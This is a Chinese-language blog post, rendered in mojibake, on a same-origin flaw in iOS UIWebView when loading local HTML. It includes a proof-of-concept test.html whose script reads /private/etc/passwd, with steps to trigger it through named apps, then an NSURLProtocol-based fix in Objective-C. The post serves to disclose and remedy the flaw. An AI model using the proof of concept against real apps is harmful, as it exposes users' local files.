åIOSå¼åçåå¦ç»å¸¸ç¨å°UIWebViewï¼å¤§å¤æ¶åæ¯å è½½å¤é¨å°åï¼ä½æ¯æä¸äºæ¶åä¹ä¼ç¨æ¥å è½½æ¬å°çhtmlæ件ã
UIWebViewå è½½å¤é¨å°åçæ¶åéµå¾ªäºâåæºâçç¥ï¼èå è½½æ¬å°ç½é¡µçæ¶åå´ç»å¤äºâåæºâçç¥ï¼å¯¼è´å¯ä»¥è®¿é®ç³»ç»ä»»æè·¯å¾ã
è¿å°±æ¯UIWebViewä¸åå¨çUXSSæ¼æ´ãå·²ç¥å°æªä¿®å¤è¯¥æ¼æ´çAppæï¼å¾®çãæä»¶å ¨è½çãQQé 读ã
æ¼æ´å¤ç°æ¹å¼å¤§ä½ç¸ä¼¼ï¼ç°å¨å¾®ç为ä¾ï¼
å¨PCä¸ç¼è¾ä¸ä¸ªç½é¡µï¼å½å为test.html. å 容å¦ä¸ï¼
<script>
alert(document.location);
var aim='file:///private/etc/passwd';
var d=document;
function doAttack()
{
var xhr1= new XMLHttpRequest();
xhr1.overrideMimeType('text/plain; charset=iso-8859-1');
xhr1.open('GET',aim);
xhr1.onreadystatechange = function()
{
if(xhr1.readyState ==4)
{
var txt=xhr1.responseText;
alert(txt);
}
};
xhr1.send();
}
doAttack();
</script>
éè¿æ件åéå°å¾®ä¿¡ææºç«¯ï¼å¨å¾®ä¿¡ææºç«¯ç¹å»åæåè¿æ¥çæ件ï¼éæ©ç¨å ¶ä»åºç¨æå¼ï¼å¨å¼¹åºæ¥çåºç¨å表ééæ©âå¾®çâï¼è¿ä¸ªæ¶åä¼è¿å ¥å¾®ççé¢ï¼ç¹å»ä¸ä¼ æé®ï¼ä¸ä¼ å®æ¯åï¼å¨æçå¾®çæ件å表ä¸ç¹å»åæä¸ä¼ çæ件ï¼è¿ä¸ªæ¶åä¼å¼¹åºä¸ä¸ªalertæ¡æ¾ç¤ºå½åæ件æå¨è·¯å¾ï¼ç¹å»â好âï¼æ¥çå°±ä¼æ¾ç¤ºç³»ç»è´¦æ·åå¯ç ä¿¡æ¯ï¼ä¹å°±æ¯passwdæ件çå 容ï¼ã
ææå¾å¦ä¸:
ä¿®å¤æ¹æ¡
<1>ç¦ç¨ä»å¤é¨æå¼HTMLæ件ï¼(åææ»å»å ¥å£)
<2>é对æ¬å°HTMLæ件ä¸èæ¬åä¸äºæééå¶ï¼ï¼åæ¥é²èæªæ½ï¼
<3>æ°å¢ä¸ä¸ªNSURLProtocol, ä¸é¨ç¨æ¥å¤çæ¬å°ç½é¡µçå è½½ï¼æ ¹æ®åæºçç¥æ¥å®å ¨å°å è½½æ¬å°æ件ãï¼å½»åºç解å³æ¹æ¡ï¼
åé¢ä¸¤ç§æ¹æ¡ç¸å¯¹ç®åä¸äºï¼è¿éä¸èµè¿°ã
è¿é主è¦è®²è®²ç¬¬ä¸ç§æ¹æ¡ï¼
æ们ç¥éIOSä¸å¯¹äºåç§åè®®ï¼httpï¼https, ftp, fileï¼çå¤çé½æ¯éè¿NSURLProtocolæ¥å®ç°çï¼
æ¯ä¸ç§å¯¹åºäºä¸ä¸ªNSURLProtocolï¼æ以ä¸å 个éè¦çæ¹æ³ï¼
+ (BOOL)registerClass:(Class)protocolClass
注åNSURLProtocolï¼
+ (void)unregisterClass:(Class)protocolClass
å注åNSURLProtocol
+ (BOOL)canInitWithRequest:(NSURLRequest *)request
表示æ¯å¦èµ°è¯¥NSURLProtocolçå¤çé»è¾ï¼è¿åYES,表示走ï¼NO 表示ä¸èµ°ï¼
- (void)startLoading
表示å¼å§å 载请æ±ï¼ç±ç³»ç»è°ç¨è¯¥æ¹æ³ï¼æ们åªéå¨è¯¥æ¹æ³å é¨åç½ç»æ°æ®è¯·æ±å°±å¯ä»¥
- (void)stopLoading
表示åæ¢å 载请æ±ï¼ç±ç³»ç»è°ç¨è¯¥æ¹æ³ï¼æ们åªéå¨è¯¥æ¹æ³å é¨åä¸äºåæ¶è¯·æ±æä½
æ们æ°å»ºä¸ä¸ªç±»æ´¾çèªNSURLProtocolï¼ æä¸å½å为SeMobSandBoxFileProtocol
å¨AppDelegateçapplication:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptionsåè°ä¸è°ç¨
[NSURLProtocol registerClass:[SeMobSandBoxFileProtocol class]]; //注åæ们çåè®®
SeMobSandBoxFileProtocol.hãSeMobSandBoxFileProtocol.må 容åå«å¦ä¸ï¼
#import <Foundation/Foundation.h>
@interface SeMobSandBoxFileProtocol : NSURLProtocol
@end
#import "SeMobSandBoxFileProtocol.h"
@implementation SeMobSandBoxFileProtocol
+ (NSArray *)supportedScheme
{
return [NSArray arrayWithObjects:@"file", nil];
}
+ (BOOL)canInitWithRequest:(NSURLRequest *)request
{
NSURL* url=[request URL];
NSUInteger index = [[self supportedScheme] indexOfObject:[url scheme]];
if (index!=NSNotFound)
{
NSURL* baseURL=[[request mainDocumentURL] URLByDeletingLastPathComponent];
NSString* baseString=[[baseURL absoluteString] lowercaseString]; //å¾å°ä¸»èµæºçè·¯å¾
NSRange sharpRange=[baseString rangeOfString:@"#"];
if (sharpRange.length) {
baseString=[baseString substringToIndex:sharpRange.location]; //è·¯å¾è¿æ»¤å¤çï¼å»æ#å·ä»¥å#å·åé¢çå
容
}
if([baseURL isFileURL]) {
BOOL ok=![[[url absoluteString] lowercaseString] hasPrefix:baseString]; //å¤æåèµæºè·¯å¾æ¯å¦å
å«ä¸»èµæºè·¯å¾åç¼
return ok;
}
else
{
return baseString.length>0;
}
}
return NO;
}
- (void)stopLoading
{
}
-(void)startLoading
{
[[self client] URLProtocol:self didFailWithError:[NSError errorWithDomain:@"CFNetwork" code:kCFURLErrorUnknown userInfo:@{@"NSErrorFailingURLKey":self.request.URL}]];
}
+ (NSURLRequest *)canonicalRequestForRequest:(NSURLRequest *)request {
return request;
}
@end
代ç åæ
æ»ä½æè·¯æ¯æ ¹æ®ä¸»èµæºä¸åèµæºçæ件路å¾å¤æå®ä»¬æ¯ä¸æ¯ç¶åç®å½å ³ç³»ï¼å¦ææ¯çè¯ï¼å°±å 许访é®åèµæºï¼å¦åå°±ä¸å 许ï¼è¿æ ·å°±é»æ¢äºåèµæºè®¿é®ä¸»èµæºå¯¹åºç®å½ä»¥å¤çç®å½ï¼å 为å¤ææ¯å¦ä¸ºç¶åç®å½å ³ç³»ï¼æ¯æ ¹æ®æ¯å¦å å«ç®å½åç¼æ¥å¤æçï¼æ以éè¦å¯¹è·¯å¾è¿è¡è¿æ»¤å¤çï¼æè·¯å¾ä¸#å·åé¢çå 容è¿å#ä¸èµ·è¿æ»¤æã